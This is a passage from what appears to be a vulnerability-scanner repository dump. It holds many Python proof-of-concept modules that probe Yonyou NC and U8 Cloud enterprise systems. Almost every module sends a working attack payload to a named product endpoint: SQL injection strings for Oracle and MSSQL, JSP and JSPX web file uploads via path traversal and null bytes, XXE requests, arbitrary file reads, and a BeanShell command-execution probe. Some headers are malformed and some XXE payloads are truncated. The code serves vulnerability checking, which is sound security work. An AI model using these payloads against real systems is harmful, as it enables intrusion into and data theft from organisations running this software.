19 | vurl = urllib.parse.urljoin(url, "/ecp/productonsale/querygoodsgridbycode.json?code=1%27%29+AND+9976%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%289976%3D9976%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28118%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29--+dpxi")
20 | try:
21 | response = requests.post(vurl, headers=headers)
22 | if response.status_code == 200 and 'qbzqq' in response.text:
23 | relsult['vulnerable'] = True
24 | relsult['verify'] = vurl
25 | return relsult
26 |
27 | except:
28 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/yongyou_nc_rce_2022.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib, re
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '用友NC bsh.servlet.BshServlet 命令执行(2022HVV)',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | timeout = 3
11 | headers = {
12 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0',
13 | 'Content-Type': 'application/x-www-form-urlencoded',
14 | }
15 | vurl = urllib.parse.urljoin(url, '/servlet//~ic/bsh.servlet.BshServlet')
16 | try:
17 | rep = requests.get(vurl, headers=headers, verify=False, timeout=timeout)
18 | if rep.status_code == 200 and re.search('BeanShell Test Servle', rep.text):
19 | relsult['vulnerable'] = True
20 | relsult['vurl'] = vurl
21 | return relsult
22 | except:
23 | return relsult
24 |
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/yongyou_nc_runStateServlet_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '用友NC-runStateServlet接口存在SQL注入漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'Content-Type': 'application/x-www-form-urlencoded',
12 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36'
13 | }
14 | vurl = urllib.parse.urljoin(url, "/portal/pt/servlet/runStateServlet/doPost?pageId=login&proInsPk=1'waitfor+delay+'0:0:5'--")
15 | try:
16 | response = requests.get(vurl, headers=headers)
17 | if response.status_code == 500 and response.elapsed.total_seconds() > 5:
18 | relsult['vulnerable'] = True
19 | relsult['verify'] = vurl
20 | return relsult
21 |
22 | except:
23 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/yongyou_nc_saveImageServlet_fileupload.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | from inc.generate_random import generate_random_number
5 |
6 |
7 | def verify(url):
8 | relsult = {
9 | 'name': '用友NC_saveImageServlet接口存在文件上传漏洞',
10 | 'vulnerable': False,
11 | 'url': url
12 | }
13 | headers = {
14 | 'Content-Type': 'application/octet-stream',
15 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36'
16 | }
17 | char_data = generate_random_number(15)
18 | char = generate_random_number(6)
19 | data = f'''{char_data}'''
20 | vurl = urllib.parse.urljoin(url, f"/portal/pt/servlet/saveImageServlet/doPost?pageId=login&filename=../{char}.jsp%00")
21 | try:
22 | response = requests.post(vurl, headers=headers, data=data)
23 | if response.status_code == 200:
24 | vurl = url + f'/portal/processxml/{char}.jsp'
25 | response = requests.get(vurl)
26 | if response.status_code == 200 and char_data in response.text:
27 | relsult['vulnerable'] = True
28 | relsult['verify'] = vurl
29 | return relsult
30 |
31 | except:
32 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/yongyou_nc_showcontent_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '用友NC-showcontent接口存在sql注入漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)'
12 | }
13 | vurl = urllib.parse.urljoin(url, "/ebvp/infopub/showcontent?id=1'%20AND%203983=DBMS_PIPE.RECEIVE_MESSAGE(CHR(70)||CHR(76)||CHR(108)||CHR(101),9)%20AND%20'Mgtn'='Mgtn")
14 | try:
15 | response = requests.get(vurl, headers=headers)
16 | if response.status_code == 500 and response.elapsed.total_seconds() > 5:
17 | relsult['vulnerable'] = True
18 | relsult['verify'] = vurl
19 | return relsult
20 |
21 | except:
22 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/yongyou_nc_smartweb2.RPC.d_xml.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '用友NC_CLOUD_smartweb2.RPC.d_XML外部实体注入',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25',
12 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
13 | 'Accept-Encoding': 'gzip, deflate',
14 | 'Accept-Language': 'zh-CN,zh;q=0.9',
15 | 'Connection': 'close',
16 | 'Content-Type': 'application/x-www-form-urlencoded'
17 | }
18 | data = '''__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=]>%26Password;
'''
19 | vurl = urllib.parse.urljoin(url, "/hrss/dorado/smartweb2.RPC.d?__rpc=true")
20 | try:
21 | response = requests.post(vurl, headers=headers, data=data)
22 | if response.status_code == 200 and '[fonts]' in response.text:
23 | relsult['vulnerable'] = True
24 | relsult['verify'] = vurl
25 | return relsult
26 |
27 | except:
28 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/yongyou_nc_soapFormat_xxe.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '用友NC_Cloud_soapFormat.ajax接口存在XXE',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0',
12 | 'Accept-Encoding': 'gzip, deflate',
13 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
14 | 'Connection': 'close',
15 | 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
16 | 'Upgrade-Insecure-Requests': '1',
17 | 'Content-Type': 'application/x-www-form-urlencoded'
18 | }
19 | data = '''msg= ]>soap:Server%26xxe1two%3b%0a'''
20 | vurl = urllib.parse.urljoin(url, "/uapws/soapFormat.ajax")
21 | try:
22 | response = requests.post(vurl, headers=headers, data=data)
23 | if response.status_code == 200 and '[fonts]' in response.text:
24 | relsult['vulnerable'] = True
25 | relsult['verify'] = vurl
26 | return relsult
27 |
28 | except:
29 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/yongyou_nc_uploadChunk _fileupload.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | from inc.generate_random import generate_random_number
5 |
6 |
7 | def verify(url):
8 | relsult = {
9 | 'name': '用友NC-Cloud uploadChunk 任意文件上传漏洞',
10 | 'vulnerable': False,
11 | 'url': url
12 | }
13 | headers = {
14 | 'Content-Type': 'multipart/form-data; boundary=024ff46f71634a1c9bf8ec5820c26fa9'
15 | }
16 | num = generate_random_number(6)
17 | num_data = generate_random_number(12)
18 | data = f'''--024ff46f71634a1c9bf8ec5820c26fa9--
19 | Content-Disposition: form-data; name="file"; filename="{num}.txt"
20 |
21 | {num_data}
22 | --024ff46f71634a1c9bf8ec5820c26fa9--'''
23 | vurl = urllib.parse.urljoin(url, "/ncchr/pm/fb/attachment/uploadChunk?fileGuid=/../../../nccloud/&chunk=1&chunks=1")
24 | try:
25 | response = requests.post(vurl, headers=headers, data=data)
26 | if response.status_code == 200:
27 | vurl = url + f'/nccloud/{num}.txt'
28 | response = requests.get(vurl)
29 | if response.status_code == 200 and num_data in response.text:
30 | relsult['vulnerable'] = True
31 | relsult['verify'] = vurl
32 | return relsult
33 |
34 | except:
35 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/yongyou_nc_uploadControl_fileupload.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | from inc.generate_random import generate_random_str
5 | def verify(url):
6 | relsult = {
7 | 'name': '用友NC-uploadControl接口存在文件上传漏洞',
8 | 'vulnerable': False,
9 | 'url': url
10 | }
11 | headers = {
12 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36',
13 | 'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundaryoDIsCqVMmF83ptmp',
14 | }
15 | char = generate_random_str(6)
16 | data = f'''------WebKitFormBoundaryoDIsCqVMmF83ptmp
17 | Content-Disposition: form-data; name="file"; filename="{char}.jsp"
18 | Content-Type: application/octet-stream
19 |
20 | test
21 | ------WebKitFormBoundaryoDIsCqVMmF83ptmp
22 | Content-Disposition: form-data; name="submit"
23 |
24 | 上传
25 | ------WebKitFormBoundaryoDIsCqVMmF83ptmp'''
26 | vurl = urllib.parse.urljoin(url, "/mp/login/../uploadControl/uploadFile")
27 | try:
28 | response = requests.post(vurl, headers=headers, data=data)
29 | if response.status_code == 200 and 'true' in response.text:
30 | vurl = url + f'/mp/uploadFileDir/{char}.jsp'
31 | response = requests.get(vurl)
32 | if response.status_code == 200 and 'test' in response.text:
33 | relsult['vulnerable'] = True
34 | relsult['verify'] = vurl
35 | return relsult
36 |
37 | except:
38 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/yongyou_nc_warningDetailInfo_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '用友NC-warningDetailInfo接口存在SQL注入漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)',
12 | 'Content-Type':'application/x-www-form-urlencoded'
13 | }
14 | vurl = urllib.parse.urljoin(url, "/ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'--")
15 | try:
16 | response = requests.get(vurl, headers=headers)
17 | if response.status_code == 500 and response.elapsed.total_seconds() > 5:
18 | relsult['vulnerable'] = True
19 | relsult['verify'] = vurl
20 | return relsult
21 |
22 | except:
23 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/yongyou_nc_word.docx_lfi.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '用友NC word.docx任意文件读取漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)',
12 | 'Connection':'close'
13 | }
14 | vurl = urllib.parse.urljoin(url, "/portal/docctr/open/word.docx?disp=/WEB-INF/web.xml")
15 | try:
16 | response = requests.get(vurl, headers=headers)
17 | if response.status_code == 200 and '.jsp' in response.text:
18 | relsult['vulnerable'] = True
19 | relsult['verify'] = vurl
20 | return relsult
21 |
22 | except:
23 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/yongyou_nc_workflowImageServlet_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '用友NC-workflowImageServlet接口存在sql注入漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)',
12 | 'Content-Type':'application/x-www-form-urlencoded'
13 | }
14 | vurl = urllib.parse.urljoin(url, "/portal/pt/servlet/workflowImageServlet/doPost?pageId=login&wfpk=1&proInsPk=1'waitfor+delay+'0:0:6'--")
15 | try:
16 | response = requests.get(vurl, headers=headers)
17 | if response.status_code == 500 and response.elapsed.total_seconds() > 5:
18 | relsult['vulnerable'] = True
19 | relsult['verify'] = vurl
20 | return relsult
21 |
22 | except:
23 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/yongyou_ncsaveDoc.ajax_fileupload.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | from inc.generate_random import generate_random_str
5 |
6 |
7 | def verify(url):
8 | relsult = {
9 | 'name': '用友NC-saveDoc.ajax存在任意文件上传漏洞',
10 | 'vulnerable': False,
11 | 'url': url
12 | }
13 | headers = {
14 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0',
15 | 'Content-Type': 'application/x-www-form-urlencoded'
16 | }
17 | data = '''content=
18 |
19 |
20 | out.println("Hello World!");new java.io.File(application.getRealPath(request.getServletPath())).delete();
21 |
22 | '''
23 | char = generate_random_str(6)
24 | vurl = urllib.parse.urljoin(url, f"/uapws/saveDoc.ajax?ws=/../../{char}.jspx%00")
25 | try:
26 | response = requests.post(vurl, headers=headers)
27 | if response.status_code == 200:
28 | vurl = url + f'/uapws/{char}.jspx'
29 | response = requests.get(vurl)
30 | if response.status_code == 200 and 'World!' in response.text:
31 | relsult['vulnerable'] = True
32 | relsult['verify'] = vurl
33 | return relsult
34 |
35 | except:
36 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/u8/__pycache__/yongyou_u8_FileServlet_lfi.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/u8/__pycache__/yongyou_u8_FileServlet_lfi.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/u8/__pycache__/yongyou_u8_KeyWordDetailReportQuery_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/u8/__pycache__/yongyou_u8_KeyWordDetailReportQuery_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/u8/__pycache__/yongyou_u8_KeyWordReportQuery_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/u8/__pycache__/yongyou_u8_KeyWordReportQuery_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/u8/__pycache__/yongyou_u8_MeasQueryConditionFrameAction_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/u8/__pycache__/yongyou_u8_MeasQueryConditionFrameAction_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/u8/__pycache__/yongyou_u8_RegisterServlet_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/u8/__pycache__/yongyou_u8_RegisterServlet_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/u8/__pycache__/yongyou_u8_ServiceDispatcherServlet_deserialization.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/u8/__pycache__/yongyou_u8_ServiceDispatcherServlet_deserialization.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/u8/__pycache__/yongyou_u8_base64_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/u8/__pycache__/yongyou_u8_base64_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/u8/__pycache__/yongyou_u8_doUpload_fileupload.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/u8/__pycache__/yongyou_u8_doUpload_fileupload.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/u8/__pycache__/yongyou_u8_linkntb_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/u8/__pycache__/yongyou_u8_linkntb_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/u8/__pycache__/yongyou_u8_runScript_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/u8/__pycache__/yongyou_u8_runScript_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/u8/__pycache__/yongyou_u8_showRPCLoadingTip_xxe.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/u8/__pycache__/yongyou_u8_showRPCLoadingTip_xxe.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/u8/__pycache__/yongyou_u8_upload_fileupload.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/u8/__pycache__/yongyou_u8_upload_fileupload.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/u8/yongyou_u8_FileServlet_lfi.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '用友U8-Cloud接口FileServlet存在任意文件读取漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)',
12 | 'Connection':'close'
13 | }
14 | vurl = urllib.parse.urljoin(url, "/service/~hrpub/nc.bs.hr.tools.trans.FileServlet?path=QzovL3dpbmRvd3Mvd2luLmluaQ==")
15 | try:
16 | response = requests.get(vurl, headers=headers)
17 | if response.status_code == 200 and '[fonts]' in response.text:
18 | relsult['vulnerable'] = True
19 | relsult['verify'] = vurl
20 | return relsult
21 |
22 | except:
23 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/u8/yongyou_u8_KeyWordDetailReportQuery_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '用友U8_cloud_KeyWordDetailReportQuery_SQL注入漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)',
12 | 'Connection':'close'
13 | }
14 | data = '''{"reportType":"';WAITFOR DELAY '0:0:5'--","usercode":"18701014496","keyword":[{"keywordPk":"1","keywordValue":"1","keywordIndex":1}]}'''
15 | vurl = urllib.parse.urljoin(url, "/servlet/~iufo/nc.itf.iufo.mobilereport.data.KeyWordDetailReportQuery")
16 | try:
17 | response = requests.post(vurl, headers=headers, data=data)
18 | if response.status_code == 200 and 'true' in response.text and response.elapsed.total_seconds() > 5:
19 | relsult['vulnerable'] = True
20 | relsult['verify'] = vurl
21 | return relsult
22 |
23 | except:
24 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/u8/yongyou_u8_KeyWordReportQuery_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '用友U8 Cloud-KeyWordReportQuery存在SQL注入漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36',
12 | 'Content-Type': 'application/x-www-form-urlencoded'
13 | }
14 | data = '''{"reportType":"1';waitfor delay '0:0:5'-- ","pageInfo":{"currentPageIndex":1,"pageSize":1},"keyword":[]}'''
15 | vurl = urllib.parse.urljoin(url, "/service/~iufo/nc.itf.iufo.mobilereport.data.KeyWordReportQuery")
16 | try:
17 | response = requests.post(vurl, headers=headers, data=data)
18 | if response.status_code == 200 and 'success' in response.text and response.elapsed.total_seconds() > 5:
19 | relsult['vulnerable'] = True
20 | relsult['verify'] = vurl
21 | return relsult
22 |
23 | except:
24 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/u8/yongyou_u8_MeasQueryConditionFrameAction_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '用友U8-Cloud系统接口MeasQueryConditionFrameAction存在SQL注入漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
12 | 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
13 | 'Accept-Encoding': 'gzip, deflate',
14 | 'Connection': 'close',
15 | 'Upgrade-Insecure-Requests': '1'
16 | }
17 | vurl = urllib.parse.urljoin(url, "/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasQueryConditionFrameAction&method=doCopy&TableSelectedID=1%27);WAITFOR+DELAY+%270:0:5%27--+")
18 | try:
19 | response = requests.get(vurl, headers=headers)
20 | if response.status_code == 200 and '错误提示' in response.text and response.elapsed.total_seconds() > 5:
21 | relsult['vulnerable'] = True
22 | relsult['verify'] = vurl
23 | return relsult
24 |
25 | except:
26 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/u8/yongyou_u8_RegisterServlet_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '用友U8-cloud RegisterServlet接口存在SQL注入漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36',
12 | 'Connection': 'close',
13 | 'Accept': '*/*',
14 | 'Accept-Language': 'en',
15 | 'Content-Type': 'application/x-www-form-urlencoded',
16 | 'X-Forwarded-For': '127.0.0.1',
17 | 'Accept-Encoding': 'gzip'
18 | }
19 | data = '''usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--'''
20 | vurl = urllib.parse.urljoin(url, "/servlet/RegisterServlet")
21 | try:
22 | response = requests.post(vurl, headers=headers, data=data)
23 | if response.status_code == 200 and 'e10adc3949ba59abbe56e057f20f883e' in response.text:
24 | relsult['vulnerable'] = True
25 | relsult['verify'] = vurl
26 | return relsult
27 |
28 | except:
29 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/u8/yongyou_u8_base64_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36',
12 | "system": "-1' or 1=@@version--+"
13 | }
14 | vurl = urllib.parse.urljoin(url, "/u8cloud/api/file/upload/base64")
15 | try:
16 | response = requests.get(vurl, headers=headers)
17 | if response.status_code == 200 and 'Microsoft' in response.text:
18 | relsult['vulnerable'] = True
19 | relsult['verify'] = vurl
20 | return relsult
21 |
22 | except:
23 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/u8/yongyou_u8_doUpload_fileupload.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '用友U8-OA协同工作系统doUpload.jsp任意文件上传漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0',
12 | 'Accept-Encoding': 'gzip, deflate, br',
13 | 'Accept': 'image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8',
14 | 'Connection': 'closeContent-Type: multipart/form-data; boundary=7b1db34fff56ef636e9a5cebcd6c9a75',
15 | 'Upgrade-Insecure-Requests': '1'
16 | }
17 | data = '''--7b1db34fff56ef636e9a5cebcd6c9a75
18 | Content-Disposition: form-data; name="iconFile"; filename="info.jsp"
19 | Content-Type: application/octet-stream
20 |
21 | <% out.println("tteesstt1"); %>
22 | --7b1db34fff56ef636e9a5cebcd6c9a75--'''
23 | vurl = urllib.parse.urljoin(url, "/yyoa/portal/tools/doUpload.jsp")
24 | try:
25 | response = requests.post(vurl, headers=headers,data=data)
26 | if response.status_code == 200 and '.jsp' in response.text:
27 | relsult['vulnerable'] = True
28 | relsult['verify'] = vurl
29 | return relsult
30 |
31 | except:
32 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/u8/yongyou_u8_linkntb_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '用友U8-Cloud-linkntb.jsp存在SQL注入漏洞(CNVD-C-2023-708748)',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36',
12 | 'Content-Type': 'text/plain; charset=UTF-8',
13 | 'Accept-Encoding': 'gzip, deflate',
14 | 'Accept': '*/*',
15 | 'Connection': 'keep-alive'
16 | }
17 | vurl = urllib.parse.urljoin(url, "/yer/html/nodes/linkntb/linkntb.jsp?pageId=linkntb&billId=1%27%29+AND+5846%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%285846%3D5846%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28107%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%29--+Astq&djdl=1&rand=1")
18 | try:
19 | response = requests.get(vurl, headers=headers)
20 | if response.status_code == 200 and 'qkqxq' in response.text:
21 | relsult['vulnerable'] = True
22 | relsult['verify'] = vurl
23 | return relsult
24 |
25 | except:
26 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/u8/yongyou_u8_login2.RegisterServlet_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '用友U8-nc.bs.sm.login2.RegisterServlet存在SQL注入漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'X-Forwarded-For': '127.0.0.1',
12 | 'Cookie': 'JSESSIONID=D523370AE42E1D2363160250C914E62A.server'
13 | }
14 | vurl = urllib.parse.urljoin(url, "/servlet/~uap/nc.bs.sm.login2.RegisterServlet?usercode=1%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,@@version,NULL,NULL,NULL,NULL--%20Jptd")
15 | try:
16 | response = requests.get(vurl, headers=headers)
17 | if response.status_code == 200 and 'Microsoft' in response.text:
18 | relsult['vulnerable'] = True
19 | relsult['verify'] = vurl
20 | return relsult
21 |
22 | except:
23 | return relsult
--------------------------------------------------------------------------------
